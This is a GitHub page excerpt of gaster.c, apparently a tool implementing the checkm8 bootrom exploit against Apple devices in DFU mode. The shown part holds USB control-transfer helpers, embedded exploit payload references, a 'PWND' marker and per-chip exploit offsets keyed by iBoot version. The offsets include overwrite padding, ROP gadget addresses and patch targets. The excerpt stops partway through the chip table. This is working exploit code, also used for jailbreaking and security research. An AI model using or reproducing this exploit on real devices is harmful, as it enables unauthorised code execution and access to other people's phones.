-
Notifications
You must be signed in to change notification settings - Fork 76
/
gaster.c
1667 lines (1552 loc) · 59 KB
/
gaster.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
/* Copyright 2023 0x7ff
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include "lzfse.h"
#ifdef HAVE_LIBUSB
# include <libusb-1.0/libusb.h>
# include <openssl/evp.h>
# include <stdbool.h>
# include <string.h>
# include <stddef.h>
#else
# include <CommonCrypto/CommonCrypto.h>
# include <CoreFoundation/CoreFoundation.h>
# include <IOKit/IOCFPlugIn.h>
# include <IOKit/usb/IOUSBLib.h>
#endif
#define DFU_DNLOAD (1)
#define AES_CMD_DEC (1U)
#define APPLE_VID (0x5AC)
#define AES_CMD_CBC (16U)
#define AES_BLOCK_SZ (16)
#define DFU_STATUS_OK (0)
#define DFU_GET_STATUS (3)
#define DFU_CLR_STATUS (4)
#define MAX_BLOCK_SZ (0x50)
#define DFU_MODE_PID (0x1227)
#define DFU_STATE_MANIFEST (7)
#define EP0_MAX_PACKET_SZ (0x40)
#define DFU_FILE_SUFFIX_LEN (16)
#define AES_KEY_SZ_BYTES_256 (32)
#define AES_KEY_TYPE_GID0 (0x200U)
#define DFU_MAX_TRANSFER_SZ (0x800)
#define DFU_STATE_MANIFEST_SYNC (6)
#define AES_KEY_SZ_256 (0x20000000U)
#define ARM_16K_TT_L2_SZ (0x2000000U)
#define DFU_STATE_MANIFEST_WAIT_RESET (8)
#define DONE_MAGIC (0x646F6E65646F6E65ULL)
#define EXEC_MAGIC (0x6578656365786563ULL)
#define MEMC_MAGIC (0x6D656D636D656D63ULL)
#define USB_MAX_STRING_DESCRIPTOR_IDX (10)
#define LZSS_F (18)
#define LZSS_N (4096)
#define DER_INT (0x2U)
#define DER_SEQ (0x30U)
#define LZSS_THRESHOLD (2)
#define DER_IA5_STR (0x16U)
#define DER_OCTET_STR (0x4U)
#define COMP_HDR_PAD_SZ (0x16C)
#define COMP_HDR_MAGIC (0x636F6D70U)
#define DER_FLAG_OPTIONAL (1U << 0U)
#define COMP_HDR_TYPE_LZSS (0x6C7A7373U)
#ifndef HAVE_LIBUSB
# if TARGET_OS_IPHONE
# define kUSBPipeStalled kUSBHostReturnPipeStalled
# else
# define kUSBPipeStalled kIOUSBPipeStalled
# endif
#endif
#ifndef MIN
# define MIN(a, b) ((a) < (b) ? (a) : (b))
#endif
typedef struct {
uint64_t func, arg;
} callback_t;
typedef struct {
const uint8_t *buf;
size_t len;
} der_item_t;
typedef struct {
uint8_t off, tag, flags;
} der_item_spec_t;
typedef struct {
uint32_t endpoint, pad_0;
uint64_t io_buffer;
uint32_t status, io_len, ret_cnt, pad_1;
uint64_t callback, next;
} dfu_callback_t;
typedef struct {
uint32_t endpoint, io_buffer, status, io_len, ret_cnt, callback, next;
} dfu_callback_armv7_t;
typedef struct {
der_item_t magic, type, vers, data, kbag, comp;
} im4p_t;
typedef struct {
der_item_t magic;
im4p_t im4p;
} img4_t;
typedef struct {
dfu_callback_t callback;
} checkm8_overwrite_t;
typedef struct {
dfu_callback_armv7_t callback;
} checkm8_overwrite_armv7_t;
typedef struct {
uint16_t vid, pid;
#ifdef HAVE_LIBUSB
struct libusb_device_handle *device;
#else
io_service_t serv;
IOUSBDeviceInterface320 **device;
CFRunLoopSourceRef async_event_source;
#endif
} usb_handle_t;
typedef bool (*usb_check_cb_t)(usb_handle_t *, void *);
enum usb_transfer {
USB_TRANSFER_OK,
USB_TRANSFER_ERROR,
USB_TRANSFER_STALL
};
typedef struct {
enum usb_transfer ret;
uint32_t sz;
} transfer_ret_t;
extern uint8_t payload_A9_bin[], payload_notA9_bin[], payload_notA9_armv7_bin[], payload_handle_checkm8_request_bin[], payload_handle_checkm8_request_armv7_bin[];
extern unsigned payload_A9_bin_len, payload_notA9_bin_len, payload_notA9_armv7_bin_len, payload_handle_checkm8_request_bin_len, payload_handle_checkm8_request_armv7_bin_len;
#include "payload_A9.h"
#include "payload_notA9.h"
#include "payload_notA9_armv7.h"
#include "payload_handle_checkm8_request.h"
#include "payload_handle_checkm8_request_armv7.h"
static uint16_t cpid;
static uint32_t payload_dest_armv7;
static const char *pwnd_str = " PWND:[checkm8]";
static der_item_spec_t der_img4_item_specs[] = {
{ 0, DER_IA5_STR, 0 },
{ 1, DER_SEQ, 0 }
}, der_im4p_item_specs[] = {
{ 0, DER_IA5_STR, 0 },
{ 1, DER_IA5_STR, 0 },
{ 2, DER_IA5_STR, 0 },
{ 3, DER_OCTET_STR, 0 },
{ 4, DER_OCTET_STR, DER_FLAG_OPTIONAL },
{ 5, DER_SEQ, DER_FLAG_OPTIONAL }
};
static unsigned usb_timeout, usb_abort_timeout_min;
static struct {
uint8_t b_len, b_descriptor_type;
uint16_t bcd_usb;
uint8_t b_device_class, b_device_sub_class, b_device_protocol, b_max_packet_sz;
uint16_t id_vendor, id_product, bcd_device;
uint8_t i_manufacturer, i_product, i_serial_number, b_num_configurations;
} device_descriptor;
static size_t config_hole, ttbr0_vrom_off, ttbr0_sram_off, config_large_leak, config_overwrite_pad;
static uint64_t tlbi, nop_gadget, ret_gadget, patch_addr, ttbr0_addr, func_gadget, write_ttbr0, memcpy_addr, aes_crypto_cmd, boot_tramp_end, gUSBSerialNumber, dfu_handle_request, usb_core_do_transfer, dfu_handle_bus_reset, insecure_memory_base, handle_interface_request, usb_create_string_descriptor, usb_serial_number_string_descriptor;
static void
sleep_ms(unsigned ms) {
#ifdef WIN32
Sleep(ms);
#else
struct timespec ts;
ts.tv_sec = ms / 1000;
ts.tv_nsec = (ms % 1000) * 1000000L;
nanosleep(&ts, NULL);
#endif
}
#ifdef HAVE_LIBUSB
static void
close_usb_handle(usb_handle_t *handle) {
libusb_close(handle->device);
libusb_exit(NULL);
}
static void
reset_usb_handle(const usb_handle_t *handle) {
libusb_reset_device(handle->device);
}
static bool
wait_usb_handle(usb_handle_t *handle, usb_check_cb_t usb_check_cb, void *arg) {
if(libusb_init(NULL) == LIBUSB_SUCCESS) {
printf("[libusb] Waiting for the USB handle with VID: 0x%" PRIX16 ", PID: 0x%" PRIX16 "\n", handle->vid, handle->pid);
for(;;) {
if((handle->device = libusb_open_device_with_vid_pid(NULL, handle->vid, handle->pid)) != NULL) {
if(libusb_set_configuration(handle->device, 1) == LIBUSB_SUCCESS && (usb_check_cb == NULL || usb_check_cb(handle, arg))) {
puts("Found the USB handle.");
return true;
}
libusb_close(handle->device);
}
sleep_ms(usb_timeout);
}
}
return false;
}
static void
usb_async_cb(struct libusb_transfer *transfer) {
*(int *)transfer->user_data = 1;
}
static bool
send_usb_control_request(const usb_handle_t *handle, uint8_t bm_request_type, uint8_t b_request, uint16_t w_value, uint16_t w_index, void *p_data, size_t w_len, transfer_ret_t *transfer_ret) {
int ret = libusb_control_transfer(handle->device, bm_request_type, b_request, w_value, w_index, p_data, (uint16_t)w_len, usb_timeout);
if(transfer_ret != NULL) {
if(ret >= 0) {
transfer_ret->sz = (uint32_t)ret;
transfer_ret->ret = USB_TRANSFER_OK;
} else if(ret == LIBUSB_ERROR_PIPE) {
transfer_ret->ret = USB_TRANSFER_STALL;
} else {
transfer_ret->ret = USB_TRANSFER_ERROR;
}
}
return true;
}
static bool
send_usb_control_request_async(const usb_handle_t *handle, uint8_t bm_request_type, uint8_t b_request, uint16_t w_value, uint16_t w_index, void *p_data, size_t w_len, unsigned usb_abort_timeout, transfer_ret_t *transfer_ret) {
struct libusb_transfer *transfer = libusb_alloc_transfer(0);
struct timeval tv;
int completed = 0;
uint8_t *buf;
if(transfer != NULL) {
if((buf = malloc(LIBUSB_CONTROL_SETUP_SIZE + w_len)) != NULL) {
if((bm_request_type & LIBUSB_ENDPOINT_DIR_MASK) == LIBUSB_ENDPOINT_OUT) {
memcpy(buf + LIBUSB_CONTROL_SETUP_SIZE, p_data, w_len);
}
libusb_fill_control_setup(buf, bm_request_type, b_request, w_value, w_index, (uint16_t)w_len);
libusb_fill_control_transfer(transfer, handle->device, buf, usb_async_cb, &completed, usb_timeout);
if(libusb_submit_transfer(transfer) == LIBUSB_SUCCESS) {
tv.tv_sec = usb_abort_timeout / 1000;
tv.tv_usec = (usb_abort_timeout % 1000) * 1000;
while(completed == 0 && libusb_handle_events_timeout_completed(NULL, &tv, &completed) == LIBUSB_SUCCESS) {
libusb_cancel_transfer(transfer);
}
if(completed != 0) {
if((bm_request_type & LIBUSB_ENDPOINT_DIR_MASK) == LIBUSB_ENDPOINT_IN) {
memcpy(p_data, libusb_control_transfer_get_data(transfer), transfer->actual_length);
}
if(transfer_ret != NULL) {
transfer_ret->sz = (uint32_t)transfer->actual_length;
if(transfer->status == LIBUSB_TRANSFER_COMPLETED) {
transfer_ret->ret = USB_TRANSFER_OK;
} else if(transfer->status == LIBUSB_TRANSFER_STALL) {
transfer_ret->ret = USB_TRANSFER_STALL;
} else {
transfer_ret->ret = USB_TRANSFER_ERROR;
}
}
}
}
free(buf);
}
libusb_free_transfer(transfer);
}
return completed != 0;
}
static void
init_usb_handle(usb_handle_t *handle, uint16_t vid, uint16_t pid) {
handle->vid = vid;
handle->pid = pid;
handle->device = NULL;
}
#else
static void
cf_dictionary_set_int16(CFMutableDictionaryRef dict, const void *key, uint16_t val) {
CFNumberRef cf_val = CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt16Type, &val);
if(cf_val != NULL) {
CFDictionarySetValue(dict, key, cf_val);
CFRelease(cf_val);
}
}
static bool
query_usb_interface(io_service_t serv, CFUUIDRef plugin_type, CFUUIDRef interface_type, LPVOID *interface) {
IOCFPlugInInterface **plugin_interface;
bool ret = false;
SInt32 score;
if(IOCreatePlugInInterfaceForService(serv, plugin_type, kIOCFPlugInInterfaceID, &plugin_interface, &score) == kIOReturnSuccess) {
ret = (*plugin_interface)->QueryInterface(plugin_interface, CFUUIDGetUUIDBytes(interface_type), interface) == kIOReturnSuccess;
IODestroyPlugInInterface(plugin_interface);
}
IOObjectRelease(serv);
return ret;
}
static void
close_usb_device(usb_handle_t *handle) {
CFRunLoopRemoveSource(CFRunLoopGetCurrent(), handle->async_event_source, kCFRunLoopDefaultMode);
CFRelease(handle->async_event_source);
(*handle->device)->USBDeviceClose(handle->device);
(*handle->device)->Release(handle->device);
}
static void
close_usb_handle(usb_handle_t *handle) {
close_usb_device(handle);
}
static bool
open_usb_device(io_service_t serv, usb_handle_t *handle) {
bool ret = false;
if(query_usb_interface(serv, kIOUSBDeviceUserClientTypeID, kIOUSBDeviceInterfaceID320, (LPVOID *)&handle->device)) {
if((*handle->device)->USBDeviceOpen(handle->device) == kIOReturnSuccess) {
if((*handle->device)->SetConfiguration(handle->device, 1) == kIOReturnSuccess && (*handle->device)->CreateDeviceAsyncEventSource(handle->device, &handle->async_event_source) == kIOReturnSuccess) {
CFRunLoopAddSource(CFRunLoopGetCurrent(), handle->async_event_source, kCFRunLoopDefaultMode);
ret = true;
} else {
(*handle->device)->USBDeviceClose(handle->device);
}
}
if(!ret) {
(*handle->device)->Release(handle->device);
}
}
return ret;
}
static bool
wait_usb_handle(usb_handle_t *handle, usb_check_cb_t usb_check_cb, void *arg) {
CFMutableDictionaryRef matching_dict;
const char *darwin_device_class;
io_iterator_t iter;
io_service_t serv;
bool ret = false;
printf("[IOKit] Waiting for the USB handle with VID: 0x%" PRIX16 ", PID: 0x%" PRIX16 "\n", handle->vid, handle->pid);
#if TARGET_OS_IPHONE
darwin_device_class = "IOUSBHostDevice";
#else
darwin_device_class = kIOUSBDeviceClassName;
#endif
while((matching_dict = IOServiceMatching(darwin_device_class)) != NULL) {
cf_dictionary_set_int16(matching_dict, CFSTR(kUSBVendorID), handle->vid);
cf_dictionary_set_int16(matching_dict, CFSTR(kUSBProductID), handle->pid);
if(IOServiceGetMatchingServices(0, matching_dict, &iter) == kIOReturnSuccess) {
while((serv = IOIteratorNext(iter)) != IO_OBJECT_NULL) {
if(open_usb_device(serv, handle)) {
if(usb_check_cb == NULL || usb_check_cb(handle, arg)) {
puts("Found the USB handle.");
ret = true;
break;
}
close_usb_device(handle);
}
}
IOObjectRelease(iter);
if(ret) {
break;
}
sleep_ms(usb_timeout);
}
}
return ret;
}
static void
reset_usb_handle(usb_handle_t *handle) {
(*handle->device)->ResetDevice(handle->device);
(*handle->device)->USBDeviceReEnumerate(handle->device, 0);
}
static void
usb_async_cb(void *refcon, IOReturn ret, void *arg) {
transfer_ret_t *transfer_ret = refcon;
if(transfer_ret != NULL) {
memcpy(&transfer_ret->sz, &arg, sizeof(transfer_ret->sz));
if(ret == kIOReturnSuccess) {
transfer_ret->ret = USB_TRANSFER_OK;
} else if(ret == kUSBPipeStalled) {
transfer_ret->ret = USB_TRANSFER_STALL;
} else {
transfer_ret->ret = USB_TRANSFER_ERROR;
}
}
CFRunLoopStop(CFRunLoopGetCurrent());
}
static bool
send_usb_control_request(const usb_handle_t *handle, uint8_t bm_request_type, uint8_t b_request, uint16_t w_value, uint16_t w_index, void *p_data, size_t w_len, transfer_ret_t *transfer_ret) {
IOUSBDevRequestTO req;
IOReturn ret;
req.wLenDone = 0;
req.pData = p_data;
req.bRequest = b_request;
req.bmRequestType = bm_request_type;
req.wLength = OSSwapLittleToHostInt16(w_len);
req.wValue = OSSwapLittleToHostInt16(w_value);
req.wIndex = OSSwapLittleToHostInt16(w_index);
req.completionTimeout = req.noDataTimeout = usb_timeout;
ret = (*handle->device)->DeviceRequestTO(handle->device, &req);
if(transfer_ret != NULL) {
if(ret == kIOReturnSuccess) {
transfer_ret->sz = req.wLenDone;
transfer_ret->ret = USB_TRANSFER_OK;
} else if(ret == kUSBPipeStalled) {
transfer_ret->ret = USB_TRANSFER_STALL;
} else {
transfer_ret->ret = USB_TRANSFER_ERROR;
}
}
return true;
}
static bool
send_usb_control_request_async(const usb_handle_t *handle, uint8_t bm_request_type, uint8_t b_request, uint16_t w_value, uint16_t w_index, void *p_data, size_t w_len, unsigned usb_abort_timeout, transfer_ret_t *transfer_ret) {
IOUSBDevRequestTO req;
req.wLenDone = 0;
req.pData = p_data;
req.bRequest = b_request;
req.bmRequestType = bm_request_type;
req.wLength = OSSwapLittleToHostInt16(w_len);
req.wValue = OSSwapLittleToHostInt16(w_value);
req.wIndex = OSSwapLittleToHostInt16(w_index);
req.completionTimeout = req.noDataTimeout = usb_timeout;
if((*handle->device)->DeviceRequestAsyncTO(handle->device, &req, usb_async_cb, transfer_ret) == kIOReturnSuccess) {
sleep_ms(usb_abort_timeout);
if((*handle->device)->USBDeviceAbortPipeZero(handle->device) == kIOReturnSuccess) {
CFRunLoopRun();
return true;
}
}
return false;
}
static void
init_usb_handle(usb_handle_t *handle, uint16_t vid, uint16_t pid) {
handle->vid = vid;
handle->pid = pid;
handle->device = NULL;
}
#endif
static bool
send_usb_control_request_no_data(const usb_handle_t *handle, uint8_t bm_request_type, uint8_t b_request, uint16_t w_value, uint16_t w_index, size_t w_len, transfer_ret_t *transfer_ret) {
bool ret = false;
void *p_data;
if(w_len == 0) {
ret = send_usb_control_request(handle, bm_request_type, b_request, w_value, w_index, NULL, 0, transfer_ret);
} else if((p_data = malloc(w_len)) != NULL) {
memset(p_data, '\0', w_len);
ret = send_usb_control_request(handle, bm_request_type, b_request, w_value, w_index, p_data, w_len, transfer_ret);
free(p_data);
}
return ret;
}
static bool
send_usb_control_request_async_no_data(const usb_handle_t *handle, uint8_t bm_request_type, uint8_t b_request, uint16_t w_value, uint16_t w_index, size_t w_len, unsigned usb_abort_timeout, transfer_ret_t *transfer_ret) {
bool ret = false;
void *p_data;
if(w_len == 0) {
ret = send_usb_control_request_async(handle, bm_request_type, b_request, w_value, w_index, NULL, 0, usb_abort_timeout, transfer_ret);
} else if((p_data = malloc(w_len)) != NULL) {
memset(p_data, '\0', w_len);
ret = send_usb_control_request_async(handle, bm_request_type, b_request, w_value, w_index, p_data, w_len, usb_abort_timeout, transfer_ret);
free(p_data);
}
return ret;
}
static char *
get_usb_serial_number(usb_handle_t *handle) {
transfer_ret_t transfer_ret;
uint8_t buf[UINT8_MAX];
char *str = NULL;
size_t i, sz;
if(send_usb_control_request(handle, 0x80, 6, 1U << 8U, 0, &device_descriptor, sizeof(device_descriptor), &transfer_ret) && transfer_ret.ret == USB_TRANSFER_OK && transfer_ret.sz == sizeof(device_descriptor) && send_usb_control_request(handle, 0x80, 6, (3U << 8U) | device_descriptor.i_serial_number, 0x409, buf, sizeof(buf), &transfer_ret) && transfer_ret.ret == USB_TRANSFER_OK && transfer_ret.sz == buf[0] && (sz = buf[0] / 2) != 0 && (str = malloc(sz)) != NULL) {
for(i = 0; i < sz; ++i) {
str[i] = (char)buf[2 * (i + 1)];
}
str[sz - 1] = '\0';
}
return str;
}
static bool
checkm8_check_usb_device(usb_handle_t *handle, void *pwned) {
char *usb_serial_num = get_usb_serial_number(handle);
bool ret = false;
if(usb_serial_num != NULL) {
if(strstr(usb_serial_num, " SRTG:[iBoot-1145.3]") != NULL) {
cpid = 0x8950;
config_large_leak = 659;
config_overwrite_pad = 0x640;
memcpy_addr = 0x9ACC;
aes_crypto_cmd = 0x7301;
gUSBSerialNumber = 0x10061F80;
dfu_handle_request = 0x10061A24;
payload_dest_armv7 = 0x10079800;
usb_core_do_transfer = 0x7621;
dfu_handle_bus_reset = 0x10061A3C;
insecure_memory_base = 0x10000000;
handle_interface_request = 0x8161;
usb_create_string_descriptor = 0x7C55;
usb_serial_number_string_descriptor = 0x100600D8;
} else if(strstr(usb_serial_num, " SRTG:[iBoot-1145.3.3]") != NULL) {
cpid = 0x8955;
config_large_leak = 659;
config_overwrite_pad = 0x640;
memcpy_addr = 0x9B0C;
aes_crypto_cmd = 0x7341;
gUSBSerialNumber = 0x10061F80;
dfu_handle_request = 0x10061A24;
payload_dest_armv7 = 0x10079800;
usb_core_do_transfer = 0x7661;
dfu_handle_bus_reset = 0x10061A3C;
insecure_memory_base = 0x10000000;
handle_interface_request = 0x81A1;
usb_create_string_descriptor = 0x7C95;
usb_serial_number_string_descriptor = 0x100600D8;
} else if(strstr(usb_serial_num, " SRTG:[iBoot-1458.2]") != NULL) {
cpid = 0x8947;
config_large_leak = 626;
config_overwrite_pad = 0x660;
memcpy_addr = 0x9A3C;
aes_crypto_cmd = 0x7061;
gUSBSerialNumber = 0x3402DDF8;
dfu_handle_request = 0x3402D92C;
payload_dest_armv7 = 0x34039800;
usb_core_do_transfer = 0x79ED;
dfu_handle_bus_reset = 0x3402D944;
insecure_memory_base = 0x34000000;
handle_interface_request = 0x7BC9;
usb_create_string_descriptor = 0x72A9;
usb_serial_number_string_descriptor = 0x3402C2DA;
} else if(strstr(usb_serial_num, " SRTG:[iBoot-1704.10]") != NULL) {
cpid = 0x8960;
config_large_leak = 7936;
config_overwrite_pad = 0x5C0;
patch_addr = 0x100005CE0;
memcpy_addr = 0x10000ED50;
aes_crypto_cmd = 0x10000B9A8;
boot_tramp_end = 0x1800E1000;
gUSBSerialNumber = 0x180086CDC;
dfu_handle_request = 0x180086C70;
usb_core_do_transfer = 0x10000CC78;
dfu_handle_bus_reset = 0x180086CA0;
insecure_memory_base = 0x180380000;
handle_interface_request = 0x10000CFB4;
usb_create_string_descriptor = 0x10000BFEC;
usb_serial_number_string_descriptor = 0x180080562;
} else if(strstr(usb_serial_num, " SRTG:[iBoot-1991.0.0.2.16]") != NULL) {
cpid = 0x7001;
config_overwrite_pad = 0x500;
patch_addr = 0x10000AD04;
memcpy_addr = 0x100013F10;
aes_crypto_cmd = 0x100010A90;
boot_tramp_end = 0x1800E1000;
gUSBSerialNumber = 0x180088E48;
dfu_handle_request = 0x180088DF8;
usb_core_do_transfer = 0x100011BB4;
dfu_handle_bus_reset = 0x180088E18;
insecure_memory_base = 0x180380000;
handle_interface_request = 0x100011EE4;
usb_create_string_descriptor = 0x100011074;
usb_serial_number_string_descriptor = 0x180080C2A;
} else if(strstr(usb_serial_num, " SRTG:[iBoot-1992.0.0.1.19]") != NULL) {
cpid = 0x7000;
config_overwrite_pad = 0x500;
patch_addr = 0x100007E98;
memcpy_addr = 0x100010E70;
aes_crypto_cmd = 0x10000DA90;
boot_tramp_end = 0x1800E1000;
gUSBSerialNumber = 0x1800888C8;
dfu_handle_request = 0x180088878;
usb_core_do_transfer = 0x10000EBB4;
dfu_handle_bus_reset = 0x180088898;
insecure_memory_base = 0x180380000;
handle_interface_request = 0x10000EEE4;
usb_create_string_descriptor = 0x10000E074;
usb_serial_number_string_descriptor = 0x18008062A;
} else if(strstr(usb_serial_num, " SRTG:[iBoot-2098.0.0.2.4]") != NULL) {
cpid = 0x7002;
config_overwrite_pad = 0x500;
memcpy_addr = 0x89F4;
aes_crypto_cmd = 0x6341;
gUSBSerialNumber = 0x46005958;
dfu_handle_request = 0x46005898;
payload_dest_armv7 = 0x46007800;
usb_core_do_transfer = 0x6E59;
dfu_handle_bus_reset = 0x460058B0;
insecure_memory_base = 0x46018000;
handle_interface_request = 0x7081;
usb_create_string_descriptor = 0x6745;
usb_serial_number_string_descriptor = 0x4600034A;
} else if(strstr(usb_serial_num, " SRTG:[iBoot-2234.0.0.2.22]") != NULL) {
cpid = 0x8003;
config_overwrite_pad = 0x500;
patch_addr = 0x10000812C;
ttbr0_addr = 0x1800C8000;
memcpy_addr = 0x100011030;
aes_crypto_cmd = 0x10000DAA0;
ttbr0_vrom_off = 0x400;
boot_tramp_end = 0x1800E1000;
gUSBSerialNumber = 0x180087958;
dfu_handle_request = 0x1800878F8;
usb_core_do_transfer = 0x10000EE78;
dfu_handle_bus_reset = 0x180087928;
insecure_memory_base = 0x180380000;
handle_interface_request = 0x10000F1B0;
usb_create_string_descriptor = 0x10000E354;
usb_serial_number_string_descriptor = 0x1800807DA;
} else if(strstr(usb_serial_num, " SRTG:[iBoot-2234.0.0.3.3]") != NULL) {
cpid = 0x8000;
config_overwrite_pad = 0x500;
patch_addr = 0x10000812C;
ttbr0_addr = 0x1800C8000;
memcpy_addr = 0x100011030;
aes_crypto_cmd = 0x10000DAA0;
ttbr0_vrom_off = 0x400;
boot_tramp_end = 0x1800E1000;
gUSBSerialNumber = 0x180087958;
dfu_handle_request = 0x1800878F8;
usb_core_do_transfer = 0x10000EE78;
dfu_handle_bus_reset = 0x180087928;
insecure_memory_base = 0x180380000;
handle_interface_request = 0x10000F1B0;
usb_create_string_descriptor = 0x10000E354;
usb_serial_number_string_descriptor = 0x1800807DA;
} else if(strstr(usb_serial_num, " SRTG:[iBoot-2481.0.0.2.1]") != NULL) {
cpid = 0x8001;
config_hole = 6;
config_overwrite_pad = 0x5C0;
tlbi = 0x100000404;
nop_gadget = 0x10000CD60;
ret_gadget = 0x100000118;
patch_addr = 0x100007668;
ttbr0_addr = 0x180050000;
func_gadget = 0x10000CD40;
write_ttbr0 = 0x1000003B4;
memcpy_addr = 0x1000106F0;
aes_crypto_cmd = 0x10000C9D4;
boot_tramp_end = 0x180044000;
ttbr0_vrom_off = 0x400;
ttbr0_sram_off = 0x600;
gUSBSerialNumber = 0x180047578;
dfu_handle_request = 0x18004C378;
usb_core_do_transfer = 0x10000DDA4;
dfu_handle_bus_reset = 0x18004C3A8;
insecure_memory_base = 0x180000000;
handle_interface_request = 0x10000E0B4;
usb_create_string_descriptor = 0x10000D280;
usb_serial_number_string_descriptor = 0x18004486A;
} else if(strstr(usb_serial_num, " SRTG:[iBoot-2651.0.0.1.31]") != NULL) {
cpid = 0x8002;
config_hole = 5;
config_overwrite_pad = 0x5C0;
memcpy_addr = 0xB6F8;
aes_crypto_cmd = 0x86DD;
gUSBSerialNumber = 0x48802AB8;
dfu_handle_request = 0x48806344;
payload_dest_armv7 = 0x48806E00;
usb_core_do_transfer = 0x9411;
dfu_handle_bus_reset = 0x4880635C;
insecure_memory_base = 0x48818000;
handle_interface_request = 0x95F1;
usb_create_string_descriptor = 0x8CA5;
usb_serial_number_string_descriptor = 0x4880037A;
} else if(strstr(usb_serial_num, " SRTG:[iBoot-2651.0.0.3.3]") != NULL) {
cpid = 0x8004;
config_hole = 5;
config_overwrite_pad = 0x5C0;
memcpy_addr = 0xA884;
aes_crypto_cmd = 0x786D;
gUSBSerialNumber = 0x48802AE8;
dfu_handle_request = 0x48806384;
payload_dest_armv7 = 0x48806E00;
usb_core_do_transfer = 0x85A1;
dfu_handle_bus_reset = 0x4880639C;
insecure_memory_base = 0x48818000;
handle_interface_request = 0x877D;
usb_create_string_descriptor = 0x7E35;
usb_serial_number_string_descriptor = 0x488003CA;
} else if(strstr(usb_serial_num, " SRTG:[iBoot-2696.0.0.1.33]") != NULL) {
cpid = 0x8010;
config_hole = 5;
config_overwrite_pad = 0x5C0;
tlbi = 0x100000434;
nop_gadget = 0x10000CC6C;
ret_gadget = 0x10000015C;
patch_addr = 0x1000074AC;
ttbr0_addr = 0x1800A0000;
func_gadget = 0x10000CC4C;
write_ttbr0 = 0x1000003E4;
memcpy_addr = 0x100010730;
aes_crypto_cmd = 0x10000C8F4;
boot_tramp_end = 0x1800B0000;
ttbr0_vrom_off = 0x400;
ttbr0_sram_off = 0x600;
gUSBSerialNumber = 0x180083CF8;
dfu_handle_request = 0x180088B48;
usb_core_do_transfer = 0x10000DC98;
dfu_handle_bus_reset = 0x180088B78;
insecure_memory_base = 0x1800B0000;
handle_interface_request = 0x10000DFB8;
usb_create_string_descriptor = 0x10000D150;
usb_serial_number_string_descriptor = 0x1800805DA;
} else if(strstr(usb_serial_num, " SRTG:[iBoot-3135.0.0.2.3]") != NULL) {
cpid = 0x8011;
config_hole = 6;
